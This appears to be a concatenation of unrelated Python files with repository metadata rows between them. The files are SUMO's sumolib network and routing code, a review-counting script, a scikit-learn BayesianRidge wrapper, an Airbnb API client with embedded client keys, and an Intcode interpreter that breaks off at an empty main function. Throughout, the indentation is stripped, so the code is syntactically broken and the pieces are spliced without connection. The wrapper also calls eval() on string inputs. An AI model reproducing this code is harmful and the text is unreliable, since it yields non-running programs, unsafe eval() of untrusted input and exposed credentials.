def getEdge(self, id):
return self._id2edge[id]
def getLane(self, laneID):
edge_id, lane_index = laneID.rsplit("_", 1)
return self.getEdge(edge_id).getLane(int(lane_index))
def _initRTree(self, shapeList, includeJunctions=True):
import rtree # noqa
result = rtree.index.Index()
result.interleaved = True
for ri, shape in enumerate(shapeList):
result.add(ri, shape.getBoundingBox(includeJunctions))
return result
# Please be aware that the resulting list of edges is NOT sorted
def getNeighboringEdges(self, x, y, r=0.1, includeJunctions=True, allowFallback=True):
edges = []
try:
if self._rtreeEdges is None:
self._rtreeEdges = self._initRTree(self._edges, includeJunctions)
for i in self._rtreeEdges.intersection((x - r, y - r, x + r, y + r)):
e = self._edges[i]
d = sumolib.geomhelper.distancePointToPolygon(
(x, y), e.getShape(includeJunctions))
if d < r:
edges.append((e, d))
except ImportError:
if not allowFallback:
raise
warnings.warn("Module 'rtree' not available. Using brute-force fallback.")
for the_edge in self._edges:
d = sumolib.geomhelper.distancePointToPolygon((x, y), the_edge.getShape(includeJunctions))
if d < r:
edges.append((the_edge, d))
return edges
def getNeighboringLanes(self, x, y, r=0.1, includeJunctions=True, allowFallback=True):
lanes = []
try:
if self._rtreeLanes is None:
for the_edge in self._edges:
self._allLanes += the_edge.getLanes()
self._rtreeLanes = self._initRTree(self._allLanes, includeJunctions)
for i in self._rtreeLanes.intersection((x - r, y - r, x + r, y + r)):
the_lane = self._allLanes[i]
d = sumolib.geomhelper.distancePointToPolygon((x, y), the_lane.getShape(includeJunctions))
if d < r:
lanes.append((the_lane, d))
except ImportError:
if not allowFallback:
raise
warnings.warn("Module 'rtree' not available. Using brute-force fallback.")
for the_edge in self._edges:
for the_lane in the_edge.getLanes():
d = sumolib.geomhelper.distancePointToPolygon((x, y), the_lane.getShape(includeJunctions))
if d < r:
lanes.append((the_lane, d))
return lanes
def hasNode(self, id):
return id in self._id2node
def getNode(self, id):
return self._id2node[id]
def getNodes(self):
return self._nodes
def getTLS(self, tlid):
return self._id2tls[tlid]
def getTLSSecure(self, tlid):
if tlid in self._id2tls:
tls = self._id2tls[tlid]
else:
tls = TLS(tlid)
self._id2tls[tlid] = tls
self._tlss.append(tls)
return tls
def getTrafficLights(self):
return self._tlss
def addTLS(self, tlid, inLane, outLane, linkNo):
tls = self.getTLSSecure(tlid)
tls.addConnection(inLane, outLane, linkNo)
return tls
def addTLSProgram(self, tlid, programID, offset, type, removeOthers):
tls = self.getTLSSecure(tlid)
program = TLSProgram(programID, offset, type)
if removeOthers:
tls.removePrograms()
tls.addProgram(program)
return program
def setFoes(self, junctionID, index, foes, prohibits):
self._id2node[junctionID].setFoes(index, foes, prohibits)
def forbids(self, possProhibitor, possProhibited):
return possProhibitor.getFrom().getToNode().forbids(possProhibitor, possProhibited)
def getDownstreamEdges(self, edge, distance, stopOnTLS, stopOnTurnaround):
"""return a list of lists of the form
[[firstEdge, pos, [edge_0, edge_1, ..., edge_k], aborted], ...]
where
firstEdge: is the downstream edge furthest away from the intersection,
[edge_0, ..., edge_k]: is the list of edges from the intersection downstream to firstEdge
pos: is the position on firstEdge with distance to the end of the input edge
aborted: a flag indicating whether the downstream
search stopped at a TLS or a node without incoming edges before reaching the distance threshold
"""
ret = []
seen = set()
toProc = []
toProc.append([edge, 0, []])
while not len(toProc) == 0:
ie = toProc.pop()
if ie[0] in seen:
continue
seen.add(ie[0])
if ie[1] + ie[0].getLength() >= distance:
ret.append(
[ie[0], ie[0].getLength() + ie[1] - distance, ie[2], False])
continue
if len(ie[0]._incoming) == 0:
ret.append([ie[0], ie[0].getLength() + ie[1], ie[2], True])
continue
mn = []
stop = False
for ci in ie[0]._incoming:
if ci not in seen:
prev = copy(ie[2])
if stopOnTLS and ci._tls and ci != edge and not stop:
ret.append([ie[0], ie[1], prev, True])
stop = True
elif (stopOnTurnaround and ie[0]._incoming[ci][0].getDirection() == Connection.LINKDIR_TURN and
not stop):
ret.append([ie[0], ie[1], prev, True])
stop = True
else:
prev.append(ie[0])
mn.append([ci, ie[0].getLength() + ie[1], prev])
if not stop:
toProc.extend(mn)
return ret
def getEdgesByOrigID(self, origID):
if self._origIdx is None:
self._origIdx = defaultdict(set)
for the_edge in self._edges:
for the_lane in the_edge.getLanes():
for oID in the_lane.getParam("origId", "").split():
self._origIdx[oID].add(the_edge)
return self._origIdx[origID]
def getBBoxXY(self):
"""
Get the bounding box (bottom left and top right coordinates) for a net;
Coordinates are in X and Y (not Lat and Lon)
:return [(bottom_left_X, bottom_left_Y), (top_right_X, top_right_Y)]
"""
return [(self._ranges[0][0], self._ranges[1][0]),
(self._ranges[0][1], self._ranges[1][1])]
# the diagonal of the bounding box of all nodes
def getBBoxDiameter(self):
return math.sqrt(
(self._ranges[0][0] - self._ranges[0][1]) ** 2 +
(self._ranges[1][0] - self._ranges[1][1]) ** 2)
def getGeoProj(self):
if self._proj is None:
import pyproj
try:
self._proj = pyproj.Proj(projparams=self._location["projParameter"])
except RuntimeError:
if hasattr(pyproj.datadir, 'set_data_dir'):
pyproj.datadir.set_data_dir('/usr/share/proj')
self._proj = pyproj.Proj(projparams=self._location["projParameter"])
raise
return self._proj
def getLocationOffset(self):
""" offset to be added after converting from geo-coordinates to UTM"""
return list(map(float, self._location["netOffset"].split(",")))
def getBoundary(self):
""" return xmin,ymin,xmax,ymax network coordinates"""
return list(map(float, self._location["convBoundary"].split(",")))
def convertLonLat2XY(self, lon, lat, rawUTM=False):
x, y = self.getGeoProj()(lon, lat)
if rawUTM:
return x, y
else:
x_off, y_off = self.getLocationOffset()
return x + x_off, y + y_off
def convertXY2LonLat(self, x, y, rawUTM=False):
if not rawUTM:
x_off, y_off = self.getLocationOffset()
x -= x_off
y -= y_off
return self.getGeoProj()(x, y, inverse=True)
def move(self, dx, dy, dz=0):
for n in self._nodes:
n._coord = (n._coord[0] + dx, n._coord[1] + dy, n._coord[2] + dz)
for e in self._edges:
for l in e._lanes:
l._shape = [(p[0] + dx, p[1] + dy, p[2] + dz)
for p in l.getShape3D()]
e.rebuildShape()
def getInternalPath(self, conn, fastest=False):
minInternalCost = 1e400
minPath = None
for c in conn:
if c.getViaLaneID() != "":
viaCost = 0
viaID = c.getViaLaneID()
viaPath = []
while viaID != "":
viaLane = self.getLane(viaID)
viaCost += viaLane.getLength() if not fastest else viaLane.getLength() / viaLane.getSpeed()
viaID = viaLane.getOutgoing()[0].getViaLaneID()
viaPath.append(viaLane.getEdge())
if viaCost < minInternalCost:
minInternalCost = viaCost
minPath = viaPath
return minPath, minInternalCost
def getOptimalPath(self, fromEdge, toEdge, fastest=False, maxCost=1e400, vClass=None, reversalPenalty=0,
includeFromToCost=True, withInternal=False, ignoreDirection=False,
fromPos=0, toPos=0):
"""
Finds the optimal (shortest or fastest) path for vClass from fromEdge to toEdge
by using using Dijkstra's algorithm.
It returns a pair of a tuple of edges and the cost.
If no path is found the first element is None.
The cost for the returned path is equal to the sum of all edge costs in the path,
including the internal connectors, if they are present in the network.
The path itself does not include internal edges except for the case
when the start or end edge are internal edges.
The search may be limited using the given threshold.
"""
def speedFunc(edge):
return edge.getSpeed() if fastest else 1.0
if self.hasInternal:
appendix = ()
appendixCost = 0.
while toEdge.getFunction() == "internal":
appendix = (toEdge,) + appendix
appendixCost += toEdge.getLength() / speedFunc(toEdge)
toEdge = list(toEdge.getIncoming().keys())[0]
fromCost = fromEdge.getLength() / speedFunc(fromEdge) if includeFromToCost else 0
q = [(fromCost, fromEdge.getID(), (fromEdge, ), ())]
if fromEdge == toEdge and fromPos > toPos and not ignoreDirection:
# start search on successors of fromEdge
q = []
startCost = (fromEdge.getLength() - fromPos) / speedFunc(fromEdge) if includeFromToCost else 0
for e2, conn in fromEdge.getAllowedOutgoing(vClass).items():
q.append((startCost + e2.getLength() / speedFunc(e2), e2.getID(), (fromEdge, e2), ()))
seen = set()
dist = {fromEdge: fromEdge.getLength() / speedFunc(fromEdge)}
while q:
cost, _, e1via, path = heapq.heappop(q)
e1 = e1via[-1]
if e1 in seen:
continue
seen.add(e1)
path += e1via
if e1 == toEdge:
if self.hasInternal:
return path + appendix, cost + appendixCost
if includeFromToCost and toPos == 0:
# assume toPos=0 is the default value
return path, cost
return path, cost + (-toEdge.getLength() + toPos) / speedFunc(toEdge)
if cost > maxCost:
return None, cost
for e2, conn in chain(e1.getAllowedOutgoing(vClass).items(),
e1.getIncoming().items() if ignoreDirection else []):
# print(cost, e1.getID(), e2.getID(), e2 in seen)
if e2 not in seen:
newCost = cost + e2.getLength() / speedFunc(e2)
if e2 == e1.getBidi():
newCost += reversalPenalty
minPath = (e2,)
if self.hasInternal:
viaPath, minInternalCost = self.getInternalPath(conn, fastest=fastest)
if viaPath is not None:
newCost += minInternalCost
if withInternal:
minPath = tuple(viaPath + [e2])
if e2 not in dist or newCost < dist[e2]:
dist[e2] = newCost
heapq.heappush(q, (newCost, e2.getID(), minPath, path))
return None, 1e400
def getShortestPath(self, fromEdge, toEdge, maxCost=1e400, vClass=None, reversalPenalty=0,
includeFromToCost=True, withInternal=False, ignoreDirection=False,
fromPos=0, toPos=0):
"""
Finds the shortest path from fromEdge to toEdge respecting vClass, using Dijkstra's algorithm.
It returns a pair of a tuple of edges and the cost. If no path is found the first element is None.
The cost for the returned path is equal to the sum of all edge lengths in the path,
including the internal connectors, if they are present in the network.
The path itself does not include internal edges except for the case
when the start or end edge are internal edges.
The search may be limited using the given threshold.
"""
return self.getOptimalPath(fromEdge, toEdge, False, maxCost, vClass, reversalPenalty,
includeFromToCost, withInternal, ignoreDirection, fromPos, toPos)
def getFastestPath(self, fromEdge, toEdge, maxCost=1e400, vClass=None, reversalPenalty=0,
includeFromToCost=True, withInternal=False, ignoreDirection=False,
fromPos=0, toPos=0):
"""
Finds the fastest path from fromEdge to toEdge respecting vClass, using Dijkstra's algorithm.
It returns a pair of a tuple of edges and the cost. If no path is found the first element is None.
The cost for the returned path is equal to the sum of all edge costs in the path,
including the internal connectors, if they are present in the network.
The path itself does not include internal edges except for the case
when the start or end edge are internal edges.
The search may be limited using the given threshold.
"""
return self.getOptimalPath(fromEdge, toEdge, True, maxCost, vClass, reversalPenalty,
includeFromToCost, withInternal, ignoreDirection, fromPos, toPos)
class NetReader(handler.ContentHandler):
"""Reads a network, storing the edge geometries, lane numbers and max. speeds"""
def __init__(self, **others):
self._net = others.get('net', Net())
self._currentEdge = None
self._currentNode = None
self._currentConnection = None
self._currentLane = None
self._crossingID2edgeIDs = {}
self._withPhases = others.get('withPrograms', False)
self._latestProgram = others.get('withLatestPrograms', False)
if self._latestProgram:
self._withPhases = True
self._withConnections = others.get('withConnections', True)
self._withFoes = others.get('withFoes', True)
self._withPedestrianConnections = others.get('withPedestrianConnections', False)
self._withMacroConnectors = others.get('withMacroConnectors', False)
self._withInternal = others.get('withInternal', self._withPedestrianConnections)
if self._withPedestrianConnections and not self._withInternal:
sys.stderr.write("Warning: Option withPedestrianConnections requires withInternal\n")
self._withInternal = True
self._bidiEdgeIDs = {}
def startElement(self, name, attrs):
if name == 'location':
self._net.setLocation(attrs["netOffset"], attrs["convBoundary"], attrs[
"origBoundary"], attrs["projParameter"])
if name == 'edge':
function = attrs.get('function', '')
if (function == ''
or (self._withInternal and function in ['internal', 'crossing', 'walkingarea'])
or (self._withMacroConnectors and function == 'connector')):
prio = -1
if 'priority' in attrs:
prio = int(attrs['priority'])
# get the ids
edgeID = attrs['id']
fromNodeID = attrs.get('from', None)
toNodeID = attrs.get('to', None)
# for internal junctions use the junction's id for from and to node
if function == 'internal':
fromNodeID = toNodeID = edgeID[1:edgeID.rfind('_')]
# remember edges crossed by pedestrians to link them later to the crossing objects
if function == 'crossing':
self._crossingID2edgeIDs[edgeID] = attrs.get('crossingEdges').split(' ')
self._currentEdge = self._net.addEdge(edgeID, fromNodeID, toNodeID, prio, function,
attrs.get('name', ''), attrs.get('type', ''))
self._currentEdge.setRawShape(convertShape(attrs.get('shape', '')))
bidi = attrs.get('bidi', '')
if bidi:
self._bidiEdgeIDs[edgeID] = bidi
else:
if function in ['crossing', 'walkingarea']:
self._net._crossings_and_walkingAreas.add(attrs['id'])
elif function == 'connector':
self._net._macroConnectors.add(attrs['id'])
self._currentEdge = None
if name == 'lane' and self._currentEdge is not None:
self._currentLane = self._net.addLane(
self._currentEdge,
float(attrs['speed']),
float(attrs['length']),
float(attrs.get('width', 3.2)),
attrs.get('allow'),
attrs.get('disallow'))
self._currentLane.setShape(convertShape(attrs.get('shape', '')))
if name == 'neigh' and self._currentLane is not None:
self._currentLane.setNeigh(attrs['lane'])
if name == 'junction':
if attrs['id'][0] != ':':
intLanes = None
if self._withInternal:
intLanes = attrs["intLanes"].split(" ")
self._currentNode = self._net.addNode(attrs['id'], attrs['type'],
tuple(
map(float, [attrs['x'], attrs['y'],
attrs['z'] if 'z' in attrs else '0'])),
attrs['incLanes'].split(" "), intLanes)
self._currentNode.setShape(
convertShape(attrs.get('shape', '')))
if 'fringe' in attrs:
self._currentNode._fringe = attrs['fringe']
if name == 'succ' and self._withConnections: # deprecated
if attrs['edge'][0] != ':':
self._currentEdge = self._net.getEdge(attrs['edge'])
self._currentLane = attrs['lane']
self._currentLane = int(
self._currentLane[self._currentLane.rfind('_') + 1:])
else:
self._currentEdge = None
if name == 'succlane' and self._withConnections: # deprecated
lid = attrs['lane']
if lid[0] != ':' and lid != "SUMO_NO_DESTINATION" and self._currentEdge:
connected = self._net.getEdge(lid[:lid.rfind('_')])
tolane = int(lid[lid.rfind('_') + 1:])
if 'tl' in attrs and attrs['tl'] != "":
tl = attrs['tl']
tllink = int(attrs['linkIdx'])
tlid = attrs['tl']
toEdge = self._net.getEdge(lid[:lid.rfind('_')])
tolane2 = toEdge._lanes[tolane]
tls = self._net.addTLS(
tlid, self._currentEdge._lanes[self._currentLane], tolane2, tllink)
self._currentEdge.setTLS(tls)
else:
tl = ""
tllink = -1
toEdge = self._net.getEdge(lid[:lid.rfind('_')])
tolane = toEdge._lanes[tolane]
viaLaneID = attrs['via']
self._net.addConnection(self._currentEdge, connected, self._currentEdge._lanes[
self._currentLane], tolane,
attrs['dir'], tl, tllink, attrs['state'], viaLaneID)
if name == 'connection' and self._withConnections and (attrs['from'][0] != ":" or self._withInternal):
fromEdgeID = attrs['from']
toEdgeID = attrs['to']
if ((self._withPedestrianConnections or not (fromEdgeID in self._net._crossings_and_walkingAreas or
toEdgeID in self._net._crossings_and_walkingAreas))
and (self._withMacroConnectors or not (fromEdgeID in self._net._macroConnectors or toEdgeID in
self._net._macroConnectors))):
fromEdge = self._net.getEdge(fromEdgeID)
toEdge = self._net.getEdge(toEdgeID)
fromLane = fromEdge.getLane(int(attrs['fromLane']))
toLane = toEdge.getLane(int(attrs['toLane']))
if 'tl' in attrs and attrs['tl'] != "":
tl = attrs['tl']
tllink = int(attrs['linkIndex'])
tls = self._net.addTLS(tl, fromLane, toLane, tllink)
fromEdge.setTLS(tls)
else:
tl = ""
tllink = -1
try:
viaLaneID = attrs['via']
except KeyError:
viaLaneID = ''
self._currentConnection = self._net.addConnection(
fromEdge, toEdge, fromLane, toLane, attrs['dir'], tl,
tllink, attrs['state'], viaLaneID)
# 'row-logic' is deprecated!!!
if self._withFoes and name == 'ROWLogic':
self._currentNode = attrs['id']
if name == 'logicitem' and self._withFoes: # deprecated
self._net.setFoes(
self._currentNode, int(attrs['request']), attrs["foes"], attrs["response"])
if name == 'request' and self._withFoes:
self._currentNode.setFoes(
int(attrs['index']), attrs["foes"], attrs["response"])
# tl-logic is deprecated!!! NOTE: nevertheless, this is still used by
# netconvert... (Leo)
if self._withPhases and name == 'tlLogic':
self._currentProgram = self._net.addTLSProgram(
attrs['id'], attrs['programID'], float(attrs['offset']), attrs['type'], self._latestProgram)
if self._withPhases and name == 'phase':
self._currentProgram.addPhase(
attrs['state'], int(attrs['duration']),
int(attrs['minDur']) if 'minDur' in attrs else -1,
int(attrs['maxDur']) if 'maxDur' in attrs else -1,
list(map(int, attrs['next'].split())) if 'next' in attrs else [],
attrs['name'] if 'name' in attrs else ""
)
if name == 'roundabout':
self._net.addRoundabout(
attrs['nodes'].split(), attrs['edges'].split())
if name == 'param':
if self._currentLane is not None:
self._currentLane.setParam(attrs['key'], attrs['value'])
elif self._currentEdge is not None:
self._currentEdge.setParam(attrs['key'], attrs['value'])
elif self._currentNode is not None:
self._currentNode.setParam(attrs['key'], attrs['value'])
elif self._currentConnection is not None:
self._currentConnection.setParam(attrs['key'], attrs['value'])
elif self._withPhases and self._currentProgram is not None:
self._currentProgram.setParam(attrs['key'], attrs['value'])
def endElement(self, name):
if name == 'lane':
self._currentLane = None
if name == 'edge':
self._currentEdge = None
if name == 'junction':
self._currentNode = None
if name == 'connection':
self._currentConnection = None
# 'row-logic' is deprecated!!!
if name == 'ROWLogic' or name == 'row-logic':
self._haveROWLogic = False
# tl-logic is deprecated!!!
if self._withPhases and (name == 'tlLogic' or name == 'tl-logic'):
self._currentProgram = None
if name == 'net':
for edgeID, bidiID in self._bidiEdgeIDs.items():
self._net.getEdge(edgeID)._bidi = self._net.getEdge(bidiID)
def endDocument(self):
# set crossed edges of pedestrian crossings
for crossingID, crossedEdgeIDs in self._crossingID2edgeIDs.items():
pedCrossing = self._net.getEdge(crossingID)
for crossedEdgeID in crossedEdgeIDs:
pedCrossing._addCrossingEdge(self._net.getEdge(crossedEdgeID))
def getNet(self):
return self._net
def convertShape(shapeString):
""" Convert xml shape string into float tuples.
This method converts the 2d or 3d shape string from SUMO's xml file
into a list containing 3d float-tuples. Non existant z coordinates default
to zero. If shapeString is empty, an empty list will be returned.
"""
cshape = []
for pointString in shapeString.split():
p = [float(e) for e in pointString.split(",")]
if len(p) == 2:
cshape.append((p[0], p[1], 0.))
elif len(p) == 3:
cshape.append(tuple(p))
else:
raise ValueError(
'Invalid shape point "%s", should be either 2d or 3d' % pointString)
return cshape
def readNet(filename, **others):
""" load a .net.xml file
The following named options are supported:
'net' : initialize data structurs with an existing net object (default Net())
'withPrograms' : import all traffic light programs (default False)
'withLatestPrograms' : import only the last program for each traffic light.
This is the program that would be active in sumo by default.
(default False)
'withConnections' : import all connections (default True)
'withFoes' : import right-of-way information (default True)
'withInternal' : import internal edges and lanes (default False)
'withPedestrianConnections' : import connections between sidewalks, crossings (default False)
"""
netreader = NetReader(**others)
try:
parse(gzip.open(filename), netreader)
except IOError:
parse(filename, netreader)
return netreader.getNet()
|
ngctnnnn/DRL_Traffic-Signal-Control
|
sumo-rl/sumo/tools/sumolib/net/__init__.py
|
__init__.py
|
py
| 35,544 |
python
|
en
|
code
| 17 |
github-code
|
6
|
72345890107
|
data = []
count = 0
with open ('reviews.txt', 'r') as f:
for line in f:
data.append(line)
count += 1
if count % 1000 == 0:
print(len(data))
print('Files finished reading, we have total', len(data), 'reviews')
sum_len = 0
for d in data:
sum_len = sum_len + len(d)
print('The average number of the reviews', sum_len/len(data))
|
bealeebrandt/reviews-analytics
|
read.py
|
read.py
|
py
| 373 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27009702338
|
import numpy as np
import run as r
'''
[id]
115
[name]
BayesianRidge
[input]
x_train 训练集 训练集标签数据集 二维数组 必须 定数
y_train 测试集 测试集数据集 二维数组 必须 定数
x_test 训练集标签 训练集标签标签 一维数组 必须 定数
y_test 测试集标签 测试集标签 一维数组 必须 定数
n_iter n_iter 默认为300,最大迭代次数。应该大于或等于1,可选整数 整数 不必须 定数
tol tol 默认为1e-3,如果w收敛,则停止算法,可选浮点数 浮点数 不必须 定数
alpha_1 alpha_1 默认为1e-6,Hyper-parameter:shape参数,用于先于Alpha参数的Gamma分布,可选浮点数 浮点数 不必须 定数
alpha_2 alpha_2 默认为1e-6,超参数:Gamma分布优先于alpha参数的反比例参数(速率参数),可选浮点数 浮点数 不必须 定数
lambda_1 lambda_1 默认为1e-6,Hyper-parameter:shape参数,用于先于lambda参数的Gamma分布,可选浮点数 浮点数 不必须 定数
lambda_2 lambda_2 默认为1e-6,超参数:Gamma分布先于lambda参数的反比例参数(速率参数),可选浮点数 浮点数 不必须 定数
alpha_init alpha_init 默认为None,alpha的初始值(噪声的精度)。如果未设置,则alpha_init为1/Var(y),可选浮点数 浮点数 不必须 定数
lambda_init lambda_init 默认为None,Lambda的初始值(权重的精度)。如果未设置,则lambda_init为1。..版本添加::0.22,可选浮点数 浮点数 不必须 定数
compute_score compute_score 默认为False,如果为True,则在每次优化迭代时计算对数边际可能性,可选布尔值 布尔值 不必须 定数
fit_intercept 计算截距 默认为True,是否计算此模型的截距。截距不被视为概率参数,因此没有关联的方差。如果将其设置为False,则在计算中将不使用截距(即,数据应居中),可选整数,布尔值 字符串 不必须 定数
normalize 归一化 默认为False,当fit_intercept设置为False时,将忽略此参数。如果为True,则将在回归之前通过减去均值并除以l2-范数来对回归变量X进行归一化,可选布尔值 布尔值 不必须 定数
copy_X 是否复制 默认为True,如果为True,将复制X;否则为X。否则,它可能会被覆盖,可选布尔值 布尔值 不必须 定数
verbose 详细程度 默认为False,拟合模型时为详细模式,可选布尔值 布尔值 不必须 定数
[output]
train_predict 预测 训练集预测结果 一维数组(数值)
test_predict 预测 测试集预测结果 一维数组(数值)
train_score 正确率 训练集预测结果的正确率 数字
test_score 正确率 测试集预测结果的正确率 数字
coef_ 参数向量 回归模型的系数(均值) 一维数组
intercept_ 截距 决策特征中的独立术语。如果fit_intercept=False,则设置为0.0 整数
alpha_ alpha 估计的噪声精度 浮点数
lambda_ lambda_ 估计重量的精度 浮点数
sigma_ sigma_ 权重的估计方差-协方差矩阵 二维数组
scores_ scores_ 如果calculated_score为True,则在每次优化迭代时对数边际似然值(要最大化)。该数组以从alpha和lambda的初始值获得的对数边际似然值开始,以以估计的alpha和lambda的值结束 一维数组
n_iter_ 迭代次数 达到停止标准的实际迭代次数 整数
[outline]
贝叶斯岭回归。
[describe]
贝叶斯岭回归。
拟合贝叶斯岭模型。
有关详细信息,请参见注释部分。
正则化参数的实现和优化lambda(权重的精度)和alpha(噪声的精度)
'''
def main(x_train, y_train, x_test, y_test,
n_iter=300, tol=1.e-3, alpha_1=1.e-6, alpha_2=1.e-6, lambda_1=1.e-6, lambda_2=1.e-6, alpha_init=None,
lambda_init=None, compute_score=False, fit_intercept=True, normalize=False, copy_X=True, verbose=False
):
if type(x_train) is str:
x_train = eval(x_train)
if type(y_train) is str:
y_train = eval(y_train)
if type(x_test) is str:
x_test = eval(x_test)
if type(y_test) is str:
y_test = eval(y_test)
if type(n_iter) is str:
n_iter = eval(n_iter)
if type(tol) is str:
tol = eval(tol)
if type(alpha_1) is str:
alpha_1 = eval(alpha_1)
if type(alpha_2) is str:
alpha_2 = eval(alpha_2)
if type(lambda_1) is str:
lambda_1 = eval(lambda_1)
if type(lambda_2) is str:
lambda_2 = eval(lambda_2)
if type(alpha_init) is str:
alpha_init = eval(alpha_init)
if type(lambda_init) is str:
lambda_init = eval(lambda_init)
if type(compute_score) is str:
compute_score = eval(compute_score)
if type(fit_intercept) is str:
fit_intercept = eval(fit_intercept)
if type(normalize) is str:
normalize = eval(normalize)
if type(copy_X) is str:
copy_X = eval(copy_X)
if type(verbose) is str:
verbose = eval(verbose)
return r.run(x_train=x_train, y_train=y_train, x_test=x_test, y_test=y_test, n_iter=n_iter,
tol=tol,
alpha_1=alpha_1,
alpha_2=alpha_2,
lambda_1=lambda_1,
lambda_2=lambda_2,
alpha_init=alpha_init,
lambda_init=lambda_init,
compute_score=compute_score,
fit_intercept=fit_intercept,
normalize=normalize,
copy_X=copy_X,
verbose=verbose)
if __name__ == '__main__':
import numpy as np
import json
array = np.loadtxt('D:\\123_2.csv', delimiter=',')
array = array[0:20, :]
y = array[:, -1].tolist()
x = np.delete(array, -1, axis=1).tolist()
array = array.tolist()
back = main(x, y, x, y)
print(back)
for i in back:
print(i + ":" + str(back[i]))
json.dumps(back)
|
lisunshine1234/mlp-algorithm-python
|
machine_learning/regression/linear_models/BayesianRidge/main.py
|
main.py
|
py
| 5,830 |
python
|
zh
|
code
| 0 |
github-code
|
6
|
38696958854
|
# coding=utf-8
import requests
class Airbnb(object):
"""Interface to get data from airbnb api. You can use :
api_instance = Airbnb()
api_instance.get_logement("Paris")
api_instance.get_review(logement_id)
api_instance.get_logement_details(logement_id)"""
def get_user_infos(self, user_id):
url = "https://api.airbnb.com/v2/users/%s?" % user_id
params = {
"client_id" : "3092nxybyb0otqw18e8nh5nty",
"_format" : "v1_legacy_show",
"locale" : "en-Us",
"currency" : "USD"
}
response = requests.get(url, params=params)
if response.status_code != 200:
return response.status_code
return response.content
def get_logement_details(self, logement_id):
try:
url = "https://api.airbnb.com/v2/listings/" + logement_id
except TypeError: #in case logement_id input is an integer.
url = "https://api.airbnb.com/v2/listings/" + str(logement_id)
params = {
"client_id" : "3092nxybyb0otqw18e8nh5nty", # compulsory : API KEY
"_format" : "v1_legacy_for_p3", # compulsory
"locale" : "en-US", # optionnal from here.
"currency" : "USD",
"_source" : "mobile_p3",
"number_of_guests" : "1"
}
response = requests.get(url, params=params)
if response.status_code != 200:
return response.status_code
return response.content
def get_review(self, logement_id, offset):
url = "https://api.airbnb.com/v2/reviews"
params = {
"client_id" : "d306zoyjsyarp7ifhu67rjxn52tv0t20",
"locale" : "en-US",
"currency" : "USD",
"_format" : "for_mobile_client",
"_limit" : "50",
"_offset" : offset,
"_order" : "language",
"listing_id" : logement_id,
"role" : "all"
}
response = requests.get(url, params=params)
if response.status_code != 200:
print("response status code : %s" % response.status_code)
return response.status_code
return response.content
def get_logement(self, city, checkin, checkout, offset):
"""With this function you can get lots of infos (especially the housing
ID), then get data about reviews or details of it.
The method take a city name (string) as input and return a
utf-8 encoded json string you can easily parse with json.loads() or
a HTTP status code if an error occured."""
url = "https://api.airbnb.com/v2/search_results"
key1 = "3092nxybyb0otqw18e8nh5nty"
key2 = "d306zoyjsyarp7ifhu67rjxn52tv0t20"
params = {
"client_id" : key2,
"locale" : "en-US",
"currency" : "USD",
"_limit" : "50",
"_format" : "for_search_results_with_minimal_pricing",
"_offset" : offset,
"fetch_facets" : "true",
"guests" : "1",
"ib" : "false",
"ib_add_photo_flow" : "true",
"location" : city,
"min_bathrooms" : "0",
"min_bedrooms" : "0",
"min_beds" : "1",
"min_num_pic_urls" : "0",
"price_max" : "5000",
"price_min" : "0",
"checkin" : checkin,
"checkout" : checkout,
"sort" : "1",
"user_lat" : "37.3398634",
"user_lng" : "-122.0455164"
}
response = requests.get(url, params=params)
if response.status_code != 200:
return response.status_code
return response.content
def get_available(self, logement_id, month, year, count):
"""Endpoint to get all availability for a precise listing.
We neede as input the listting id, month and year to begin from
and count as number of months to get result from.
It returns utf-8 encoded json string to parse with json.loads() or
an HTTP status code if the request failed."""
url = "https://www.airbnb.fr/api/v2/calendar_months"
params = {
"key" : "d306zoyjsyarp7ifhu67rjxn52tv0t20",
"currency" : "EUR",
"locale" : "fr",
"listing_id" : logement_id,
"month" : month,
"year" : year,
"count" : count,
"_format" : "with_conditions"
}
response = requests.get(url, params=params)
if response.status_code != 200:
return response.status_code
return response.content
def get_logement_by_gps(self, ne_lat, ne_lng, sw_lat, sw_lng, zoom, page_number, checkin=None, checkout=None):
url = "https://www.airbnb.fr/api/v2/explore_tabs"
params = {
"items_per_grid" : "18",
"key" : "d306zoyjsyarp7ifhu67rjxn52tv0t20",
"ne_lat" : ne_lat,
"ne_lng" : ne_lng,
"sw_lat" : sw_lat,
"sw_lng" : sw_lng,
"zoom" : zoom,
"location" : "paris",
"search_by_map" : "true",
"_format" : "for_explore_search_web",
"experiences_per_grid" : "20",
"guidebooks_per_gri" : "=20",
"fetch_filters" : "true",
"supports_for_you_v3" : "true",
"screen_size" : "large",
"timezone_offset" : "120",
"auto_ib" : "true",
"tab_id" : "home_tab",
"federated_search_session_id" : "87339300-cc93-4d01-b366-dc3896f7788b",
"_intents" : "p1",
"currency" : "EUR",
"locale" : "fr",
"section_offset" : page_number - 1
}
if checkin and checkout:
params['checkin'] = checkin
params['checkout'] = checkout
response = requests.get(url, params=params)
if response.status_code != 200:
return response.status_code
return response.content
if __name__ == '__main__':
# get_review("17834617")
airbnb = Airbnb()
print(airbnb.get_logement_by_gps(48.8632953507299, 2.3455012817150873, 48.86068875819463, 2.3429478187329096, 18, 2))
# print(airbnb.get_available(17834617, 5, 2017, 4))
# print(airbnb.get_logement_details(17834617))
# airbnb.get_logement("Bordeaux", 1, 2)
|
pablo-a/airbnb
|
airbnb_api.py
|
airbnb_api.py
|
py
| 6,552 |
python
|
en
|
code
| 1 |
github-code
|
6
|
3200862039
|
def getOpCode(i):
return int(str(i)[-2:])
def getParaModes(i):
modes = list(map(lambda x: int(x), str(i)[:-2]))
while len(modes) < 2:
modes.insert(0,0)
return modes
def getOperand(program, addr, mode):
operand = None
try:
operand = program[addr] if mode == 1 else program[program[addr]]
except IndexError:
pass
return operand
def execute(program):
pc = 0
while True:
op_code = getOpCode(program[pc])
modes = getParaModes(program[pc])
op1 = getOperand(program, pc + 1, modes[-1])
op2 = getOperand(program, pc + 2, modes[-2])
if op_code == 99:
return
# Add
if op_code == 1:
program[program[pc + 3]] = op1 + op2
pc += 4
continue
# Multiply
if op_code == 2:
program[program[pc + 3]] = op1 * op2
pc += 4
continue
# Input
if op_code == 3:
x = input('Input a single integer: ')
program[program[pc + 1]] = int(x)
pc += 2
continue
# Output
if op_code == 4:
print(op1)
pc += 2
continue
# Jump if true
if op_code == 5:
if op1 != 0:
pc = op2
else:
pc += 3
continue
# Jump if false
if op_code == 6:
if op1 == 0:
pc = op2
else:
pc += 3
continue
# Less than
if op_code == 7:
program[program[pc + 3]] = 1 if op1 < op2 else 0
pc += 4
continue
# Equals
if op_code == 8:
program[program[pc + 3]] = 1 if op1 == op2 else 0
pc += 4
continue
def main():
